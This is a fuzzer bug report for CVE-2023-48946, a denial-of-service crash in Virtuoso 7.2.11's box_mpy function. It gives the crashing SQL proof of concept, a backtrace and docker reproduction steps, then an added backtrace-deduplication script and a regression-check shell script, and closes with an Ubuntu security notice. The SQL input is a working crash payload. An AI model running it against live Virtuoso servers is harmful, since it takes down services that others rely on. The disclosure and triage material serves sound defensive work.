Headline
CVE-2023-48946: Fuzzer: Virtuoso 7.2.11 crashed at box_mpy · Issue #1178 · openlink/virtuoso-opensource
An issue in the box_mpy function of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE v0 ( v1 INT ) ; INSERT INTO v0 VALUES ( 2147483647 ) ; INSERT INTO v0 VALUES ( -1 ) ; INSERT INTO v0 ( v1 , v1 , v1 ) SELECT 54 , v1 , -128 FROM v0 AS v4 , v0 , v0 AS v3 NATURAL JOIN v0 AS v2 ; UPDATE v0 SET v1 = NULL WHERE ( v1 * 2147483647 , CASE WHEN v1 = 'x' THEN 75 WHEN DENSE_RANK ( 'x' ) THEN 25942677.000000 END + 16 * 127 ) IN ( SELECT v1 FROM v0 WHERE v1 >= 127 AND ( v1 * 16 , v1 , ( SELECT v1 FROM v0 WHERE ( v1 , v1 ) IN ( SELECT v1 , v1 AS v8 FROM v0 AS v6 NATURAL JOIN v0 AS v7 NATURAL JOIN v0 AS v5 NATURAL JOIN v0 WHERE v1 ) ORDER BY v1 ) ) - 'x' GROUP BY 48002391.000000 ) ;
backtrace:
#0 0xc201b3 (box_mpy+0x83)
#1 0x754c6e (code_vec_run_v+0x19be)
#2 0x7b86bb (end_node_input+0x13b)
#3 0x7af05e (qn_input+0x3ce)
#4 0x7af78f (qn_ts_send_output+0x23f)
#5 0x7b509e (table_source_input+0x16ee)
#6 0x7af05e (qn_input+0x3ce)
#7 0x44c979 (chash_fill_input+0x589)
#8 0x5370af (hash_fill_node_input+0xef)
#9 0x7af05e (qn_input+0x3ce)
#10 0x7af4c6 (qn_send_output+0x236)
#11 0x44c52e (chash_fill_input+0x13e)
#12 0x5370af (hash_fill_node_input+0xef)
#13 0x7af05e (qn_input+0x3ce)
#14 0x7af4c6 (qn_send_output+0x236)
#15 0x44c52e (chash_fill_input+0x13e)
#16 0x5370af (hash_fill_node_input+0xef)
#17 0x7af05e (qn_input+0x3ce)
#18 0x7af4c6 (qn_send_output+0x236)
#19 0x8214bd (set_ctr_vec_input+0x99d)
#20 0x7af05e (qn_input+0x3ce)
#21 0x7c1be9 (qr_dml_array_exec+0x839)
#22 0x7ce602 (sf_sql_execute+0x15d2)
#23 0x7cecde (sf_sql_execute_w+0x17e)
#24 0x7d799d (sf_sql_execute_wrapper+0x3d)
#25 0xe214bc (future_wrapper+0x3fc)
#26 0xe28dbe (_thread_boot+0x11e)
#27 0x7fa2b8a15609 (start_thread+0xd9)
#28 0x7fa2b87e5133 (clone+0x43)
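Fuzzers produce many reports of this shape, and the first triage step is to parse the backtrace and bucket it by its top frames so duplicates of the same box_mpy crash are recognised. The following is an added example of such a parser written for this page; it is not code from the Virtuoso project or from the reporter. The backtrace text is the one quoted above; the frame-format regex, the list of thread-runtime frames to skip, and the depth-3 signature are assumptions of this example, not anything the issue specifies.

```python
"""Parse a flattened crash backtrace and compute a dedup signature.

Added triage example for fuzzer crash reports like the one in this issue;
not code from Virtuoso or the reporter.
"""
import re
from collections import Counter
from dataclasses import dataclass
from hashlib import sha1

# Backtrace quoted from the issue (29 frames that the report runs together on one line).
BACKTRACE = (
    "#0 0xc201b3 (box_mpy+0x83) #1 0x754c6e (code_vec_run_v+0x19be) "
    "#2 0x7b86bb (end_node_input+0x13b) #3 0x7af05e (qn_input+0x3ce) "
    "#4 0x7af78f (qn_ts_send_output+0x23f) #5 0x7b509e (table_source_input+0x16ee) "
    "#6 0x7af05e (qn_input+0x3ce) #7 0x44c979 (chash_fill_input+0x589) "
    "#8 0x5370af (hash_fill_node_input+0xef) #9 0x7af05e (qn_input+0x3ce) "
    "#10 0x7af4c6 (qn_send_output+0x236) #11 0x44c52e (chash_fill_input+0x13e) "
    "#12 0x5370af (hash_fill_node_input+0xef) #13 0x7af05e (qn_input+0x3ce) "
    "#14 0x7af4c6 (qn_send_output+0x236) #15 0x44c52e (chash_fill_input+0x13e) "
    "#16 0x5370af (hash_fill_node_input+0xef) #17 0x7af05e (qn_input+0x3ce) "
    "#18 0x7af4c6 (qn_send_output+0x236) #19 0x8214bd (set_ctr_vec_input+0x99d) "
    "#20 0x7af05e (qn_input+0x3ce) #21 0x7c1be9 (qr_dml_array_exec+0x839) "
    "#22 0x7ce602 (sf_sql_execute+0x15d2) #23 0x7cecde (sf_sql_execute_w+0x17e) "
    "#24 0x7d799d (sf_sql_execute_wrapper+0x3d) #25 0xe214bc (future_wrapper+0x3fc) "
    "#26 0xe28dbe (_thread_boot+0x11e) #27 0x7fa2b8a15609 (start_thread+0xd9) "
    "#28 0x7fa2b87e5133 (clone+0x43)"
)

# Assumed frame layout: "#N 0xPC (function+0xOFFSET)", as in the report above.
FRAME_RE = re.compile(r"#(\d+)\s+(0x[0-9a-fA-F]+)\s+\(([^()+\s]+)\+(0x[0-9a-fA-F]+)\)")

# Thread-runtime / libc frames (assumed list) that carry no information about the bug.
SCAFFOLDING = {"future_wrapper", "_thread_boot", "start_thread", "clone"}


@dataclass(frozen=True)
class Frame:
    index: int
    pc: int
    func: str
    offset: int


def parse_backtrace(text: str) -> list[Frame]:
    """Turn the flattened text into Frame objects, outermost call last."""
    frames = [Frame(int(i), int(pc, 16), func, int(off, 16))
              for i, pc, func, off in FRAME_RE.findall(text)]
    # Frame numbers must run 0, 1, 2, ... or the report was cut or garbled.
    if [f.index for f in frames] != list(range(len(frames))):
        raise ValueError("backtrace is truncated or garbled")
    return frames


def crash_signature(frames, depth=3):
    """Top-N function names after dropping scaffolding: the usual dedup key."""
    names = [f.func for f in frames if f.func not in SCAFFOLDING]
    return tuple(names[:depth])


def signature_id(frames, depth=3):
    """Short stable id for the bucket, handy as a file or issue label."""
    return sha1("|".join(crash_signature(frames, depth)).encode()).hexdigest()[:12]


def repeated_frames(frames):
    """Functions seen more than once: shows how deeply the query plan nested."""
    counts = Counter(f.func for f in frames)
    return {func: n for func, n in counts.items() if n > 1}


if __name__ == "__main__":
    fr = parse_backtrace(BACKTRACE)
    print("crashing frame:", fr[0].func, hex(fr[0].offset))
    print("signature:", crash_signature(fr), signature_id(fr))
    print("repeated frames:", repeated_frames(fr))
```

For this report the signature is (box_mpy, code_vec_run_v, end_node_input), and the repeated qn_input / hash_fill_node_input frames reflect the nested hash joins that the NATURAL JOIN chains in the PoC build. Two reports with the same signature are almost always the same bug, even when the SQL that triggered them looks different.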
ways to reproduce (write poc to the file /tmp/test.sql first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
wait for the server to start
sleep 10
check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba
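For a maintainer or packager who wants to confirm that a rebuilt image no longer goes down on this input, the steps above can be wrapped into a single pass/fail check. The script below is an added example written for this page, not part of the issue or of the Virtuoso project. It assumes docker is available, reuses the container name, image tag and isql invocation from the steps above, and treats a non-zero isql exit status as "server not answering" (an assumption; adjust if your isql build reports connection failures differently). The PoC file defaults to /tmp/test.sql as in the reproduction steps.

```shell
#!/bin/sh
# Regression check for the crash reported above: start the image, run the
# PoC, then see whether the server still answers. Added example, not from
# the issue or from Virtuoso. Invoke as: sh check.sh run
set -u

CONTAINER="${CONTAINER:-virtdb_test}"
IMAGE="${IMAGE:-openlink/virtuoso-opensource-7:7.2.11}"
POC_FILE="${POC_FILE:-/tmp/test.sql}"

run_sql() {
    # Feed SQL from stdin to isql inside the container (same command as the steps above).
    docker exec -i "$CONTAINER" isql 1111 dba 2>&1
}

server_alive() {
    # Assumption: isql exits non-zero when it cannot reach the server.
    printf 'SELECT 1;\n' | run_sql >/dev/null 2>&1
}

verdict() {
    # $1: alive before the PoC, $2: alive after. Pure function so it can be tested offline.
    if [ "$1" = yes ] && [ "$2" = yes ]; then
        echo SURVIVED        # PoC ran and the server still answers: the input no longer crashes it
    elif [ "$1" = yes ]; then
        echo CRASH           # server was up, PoC took it down: still affected
    else
        echo UNKNOWN         # server never came up, so the PoC result means nothing
    fi
}

main() {
    docker container rm "$CONTAINER" -f >/dev/null 2>&1 || true
    docker run --name "$CONTAINER" -itd --env DBA_PASSWORD=dba "$IMAGE" >/dev/null
    # Poll rather than a fixed sleep: wait up to 60 s for the server to accept queries.
    i=0
    before=no
    while [ "$i" -lt 60 ]; do
        if server_alive; then before=yes; break; fi
        i=$((i + 1))
        sleep 1
    done
    if [ "$before" = yes ]; then
        run_sql < "$POC_FILE" >/dev/null 2>&1 || true   # the PoC itself may return an error; irrelevant
        sleep 2                                          # give a crashed process time to go away
    fi
    after=no
    [ "$before" = yes ] && server_alive && after=yes
    verdict "$before" "$after"
}

case "${1:-}" in
    run) main ;;
esac
```

The script prints SURVIVED, CRASH or UNKNOWN; wire the first word into CI and fail the job on CRASH when validating a fixed build.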
Related news
Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.